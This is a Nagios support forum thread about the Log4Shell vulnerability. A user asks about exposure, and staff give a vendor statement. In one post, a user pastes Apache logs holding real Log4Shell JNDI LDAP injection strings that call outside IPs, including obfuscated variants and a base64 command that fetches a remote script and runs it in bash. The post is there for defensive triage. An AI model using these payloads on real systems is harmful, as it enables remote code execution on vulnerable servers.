Nagios Support Forum

Support for Nagios products and services
https://support.nagios.com/forum/

Log4Shell vulnerability

https://support.nagios.com/forum/viewtopic.php?t=64192

Page 1 of 1

Log4Shell vulnerability

Posted: Mon Dec 13, 2021 2:59 pm
by mejokj
Hi Team,

Is Nagios affected by Log4Shell vulnerability and if there is any security advisory for it.

Thanks

Re: Log4Shell vulnerability

Posted: Mon Dec 13, 2021 5:38 pm
by benjaminsmith
HI mejokj,

Thanks for contacting the support team at Nagios.

We have an update with more information on this vulnerability on our company blog at:

https://www.nagios.com/news/2021/12/upd ... erability/

Regards,
Benjamin

Re: Log4Shell vulnerability

Posted: Tue Dec 14, 2021 12:45 pm
by mejokj
Thanks, Benjamin for the reply

We have gone through the document and understood that there is no impact discovered for Nagios still now.

And currently, there is nothing action required for the Log4j vulnerability? Right?

And how do we confirm from our side, anything we can chek

Re: Log4Shell vulnerability

Posted: Tue Dec 14, 2021 2:10 pm
by benjaminsmith
Hi,

If you've installed any java based packages on your systems. My recommendation would be to reach out to your admins/security teams to search your systems for the impacted version of this package.

Regards,
Benjamin

Re: Log4Shell vulnerability

Posted: Tue Dec 14, 2021 6:54 pm
by DonForigua
Hi seeing the apache logs i have

Code: Select all

167.71.13.196 - - [14/Dec/2021:10:15:44 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31353a34342e3535373734353039375a227d649eb0f26bf2b0c4880aca4a844a5cfb} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:16:22 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31363a32322e3233343636373236355a227d7d83c441b293c5626d9493d671407547} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:17:24 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32342e3636373437363939345a227d755c304a1590c222821a248253a08e3d} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:17:25 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32352e3231363433333931395a227d9a7d3bb2ff411b9afaa13b4629c5b159} HTTP/1.1\n" 400 226 "-" "-"                                                                
195.54.160.149 - - [14/Dec/2021:16:28:45 -0500] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4N
zQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo} HTTP/1.1" 200 3245 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZ
XQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8
xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}"
The last line has HTTP/1.1 200, was the attack sucessfull ?

Re: Log4Shell vulnerability

Posted: Wed Dec 15, 2021 1:59 pm
by gsmith
Hi

You need to work with your admins/security teams to assess any risk you may face.

Code: Select all

Nagios Enterprises takes data security and information integrity very seriously. Currently, we are evaluating our use of Apache products and our exposure to the vulnerability described in CVE-2021-44228.

We have updated our company blog with important information on this issue.

https://www.nagios.com/news/2021/12/update-on-apache-log4j-vulnerability/

While Nagios Core, NagiosXI, and Fusion use or depend upon Apache products they do not appear to be using vulnerable versions of the products as identified in the MITRE notification. While Nagios Log Server does use Log4j components and includes plugins for receiving Log4j data, we don't believe the product is vulnerable at this time. 

Due to the complexity and flexibility of our products and their ability to integrate into a wide variety of environments care should be taken to limit the exposure of systems to trusted entities.  

As always we also recommend that you keep your system up to date and follow the guidance of your operating system vendor and integrated application providers as is appropriate for your environment.

If we discover any vulnerabilities in Nagios software, we will immediately respond and release a fix ASAP. Please check our security page for updates.

https://www.nagios.com/products/security
Thank you
All times are UTC-05:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited